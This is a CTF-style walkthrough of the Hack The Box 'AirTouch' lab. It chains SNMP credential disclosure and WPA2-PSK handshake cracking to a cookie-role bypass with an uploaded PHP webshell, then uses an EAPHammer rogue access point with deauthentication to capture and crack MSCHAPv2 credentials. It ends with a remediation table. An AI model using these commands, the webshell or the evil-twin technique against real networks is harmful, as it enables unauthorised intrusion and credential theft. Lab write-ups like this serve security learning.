← Back to writeups

HTB AirTouch: Medium Walkthrough – SNMP Leak to WPA2-Enterprise Rogue AP Attack

09 June 2026 HTB Medium
WiFiSNMPWPA2-PSKWPA2-EnterpriseEvil TwinMSCHAPv2EAPHammer

Introduction

AirTouch simulates a multi-segment corporate environment with three isolated VLANs: Consultant, Tablets (WPA2-PSK Wi-Fi), and Corporate (WPA2-Enterprise Wi-Fi). The attack chain uses SNMP enumeration, WPA2-PSK cracking, web exploitation, and a rogue access point attack to capture MSCHAPv2 credentials.

Attack Overview

SNMP leak → SSH access to Consultant machine
Network diagram discovery → understand segmentation
WPA2-PSK crack → access to Tablets VLAN
SSH tunnel + web exploitation + cookie manipulation → RCE on AP-PSK
Certificate theft → Rogue AP (EAP-Hammer) → MSCHAPv2 capture → crack
WPA2-Enterprise auth → SSH to MGT AP → root

SNMP Enumeration & Initial Foothold

UDP port 161 (SNMP) is open. The snmp-sysdescr script reveals a plaintext password stored in the system description field:

sudo nmap -sU -p 161 --script=snmp-sysdescr 10.129.42.209

Output:

PORT    STATE SERVICE
161/udp open  snmp
| snmp-sysdescr: "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"

SSH access as consultant:

ssh consultant@10.129.42.209
# Password: RxBlZhLmOkacNWScmZ6D

Network Diagram & Segmentation Analysis

The home directory contains two images. Using an SSH local port forward to exfiltrate them:

# On target
python3 -m http.server 8000 --bind 0.0.0.0
# On attack machine
ssh -L 8000:localhost:8000 consultant@10.129.42.209
curl http://localhost:8000/diagram-net.png -o diagram-net.png

The network diagram reveals three VLANs:

VLANSubnetDescription
Consultant172.20.1.0/24Current position
Tablets192.168.3.0/24PSK Wi-Fi segment
Corporate10.10.10.0/24WPA2-Enterprise (target)

Two Wi-Fi SSIDs are present: AirTouch-Internet (PSK) and AirTouch-Office (WPA2-Enterprise).

Privilege Escalation on Consultant Machine

sudo -l
# (ALL) NOPASSWD: ALL
sudo -i

Root access reveals a pre-installed tool: /root/eaphammer (framework for WPA2-Enterprise Evil Twin attacks).

Wi-Fi Reconnaissance

Enable the wireless interface and scan:

ip link set wlan0 up
iwlist wlan0 scanning | grep -E 'ESSID|Channel|Signal'

Target SSID: AirTouch-Internet (Channel 6, PSK). Identify BSSID using airodump-ng:

airmon-ng start wlan1
airodump-ng wlan1mon

Target:

  • SSID: AirTouch-Internet
  • BSSID: F0:9F:C2:A3:F1:A7
  • Channel: 6

WPA2-PSK Handshake Capture & Crack

Force a client to reconnect with a deauthentication attack:

iwconfig wlan1mon channel 6
aireplay-ng --deauth 0 -a F0:9F:C2:A3:F1:A7 wlan1mon

Capture the handshake on a second interface:

airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 -w capture_handshake wlan1mon

Crack offline:

aircrack-ng -w wordlist.txt capture_handshake-01.cap

Password: challenge

Joining the Tablets VLAN

wpa_passphrase "AirTouch-Internet" "challenge" > wpa.conf
wpa_supplicant -B -i wlan0 -c wpa.conf
dhclient wlan0

IP 192.168.3.21 assigned. The access point at 192.168.3.1 is now reachable.

Web Application Exploitation on 192.168.3.1

Create an SSH tunnel to access the web interface:

sshpass -p "RxBlZhLmOkacNWScmZ6D" ssh -L 8080:192.168.3.1:80 consultant@10.129.42.209

Login credentials discovered later via RCE: manager:2wLFYNh4TSTgA5sNgT4. After login, the session cookie UserRole is set to user. Changing it to admin unlocks a file upload feature.

The upload endpoint blocks .php and .html. Bypass using .phtml:

<!-- webshell.phtml -->
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2>&1'); } ?></pre>

Upload webshell.phtml and execute commands. Reading /var/www/html/login.php reveals an active credential: user:JunDRDZKHDnpkpDDvay.

SSH access to the PSK AP:

ssh user@192.168.3.1
# Password: JunDRDZKHDnpkpDDvay
sudo -l
# (ALL) NOPASSWD: ALL
sudo -i

User flag:

[redacted]

Certificate Theft

As root on the Tablets AP, a certificate sync script is present:

cat /root/send_certs.sh

Contents:

REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
sshpass -p "$REMOTE_PASSWORD" scp -r /root/certs-backup/ remote@10.10.10.1:~/certs-backup/

This provides:

  • Credentials for remote on the Corporate AP (10.10.10.1)
  • TLS certificates from /root/certs-backup/ (CA, server certificate with private key, passphrase amra)

Exfiltrate the certificates:

# On the PSK AP
cp -r /root/certs-backup/ /tmp/
# From the Consultant machine
scp -r user@192.168.3.1:/tmp/certs-backup/ .

Rogue Access Point Against WPA2-Enterprise

Import the stolen certificates into EAPHammer:

/root/eaphammer/eaphammer --cert-wizard import \
  --server-cert server.crt \
  --ca-cert ca.crt \
  --private-key server.key \
  --private-key-passwd amra

Launch the rogue AP impersonating AirTouch-Office:

/root/eaphammer/eaphammer -i wlan3 --auth wpa-eap --essid AirTouch-Office

Deauthenticate the client from both legitimate APs simultaneously (both on Channel 44):

Terminal 1:

airmon-ng start wlan1
iwconfig wlan1mon channel 44
aireplay-ng wlan1mon -0 0 -a AC:8B:A9:F3:A1:13 -c C8:8A:9A:6F:F9:D2

Terminal 2:

airmon-ng start wlan2
iwconfig wlan2mon channel 44
aireplay-ng wlan2mon -0 0 -a AC:8B:A9:AA:3F:D2 -c C8:8A:9A:6F:F9:D2

The client connects to the rogue AP. EAPHammer captures the MSCHAPv2 challenge/response:

username:  r4ulcl
challenge: d0:f9:b2:e1:31:5f:05:d8
response:  a3:c7:0e:c5:a5:8c:78:34:4d:f8:7a:a3:0d:f6:e5:7b:da:40:27:5e:93:a9:17:3b

Hashcat NETNTLM format:

r4ulcl::::a3c70ec5a58c78344df87aa30df6e57bda40275e93a9173b:d0f9b2e1315f05d8

Cracked password: laboratory

Joining the Corporate VLAN & Root

Configure wpa_supplicant for WPA2-Enterprise:

network={
  ssid="AirTouch-Office"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="AirTouch\r4ulcl"
  password="laboratory"
  phase1="peapver=1"
  phase2="auth=MSCHAPV2"
}

Connect and obtain an IP:

wpa_supplicant -Dnl80211 -iwlan3 -c client.conf
dhclient -v wlan3
# Bound to 10.10.10.10

SSH to the Corporate AP using credentials from the sync script:

ssh remote@10.10.10.1
# Password: xGgWEwqUpfoOVsLeROeG

Read /etc/hostapd/hostapd_wpe.eap_user to find an admin account:

"admin"  MSCHAPV2  "xMJpzXt4D9ouMuL3JJsMriF7KZozm7"

Switch to admin and escalate to root:

su admin
# Password: xMJpzXt4D9ouMuL3JJsMriF7KZozm7
sudo -i

Root flag:

[redacted]

Key Takeaways

VulnerabilityRoot CauseRemediation
SNMP information disclosurePlaintext password stored in system description OIDNever store credentials in SNMP fields; restrict SNMP access and use non-default community strings
WPA2-PSK weak passwordPassword challenge in wordlistUse long, randomly generated PSK; implement 802.1X where possible
Broken access control via cookie manipulationUserRole cookie trusted client-sideEnforce role checks on server; never rely on client-supplied privileges
File upload restriction bypassBlocklist of .php and .html onlyUse allowlist of safe extensions; validate file contents
Credentials in scripts and config filesPlaintext SSH and EAP passwords in scriptsStore secrets in dedicated secret management; restrict file permissions
WPA2-Enterprise rogue AP attackClient does not validate server certificateEnforce strict server certificate validation on all clients; use EAP-TLS instead of PEAP/MSCHAPv2 where possible
MSCHAPv2 hash crackable offlineChallenge-response captured via rogue APMigrate to EAP-TLS or other certificate-based authentication; enable PEAPv0 with strong ciphers

Resources

  • Nmap — SNMP enumeration
  • aircrack-ng — Handshake capture and WPA2-PSK cracking
  • EAPHammer — Rogue AP framework for WPA2-Enterprise
  • hashcat — MSCHAPv2 hash cracking (mode 5500)
  • wpa_supplicant — WPA2-Enterprise client configuration
  • sshpass — Non-interactive SSH password authentication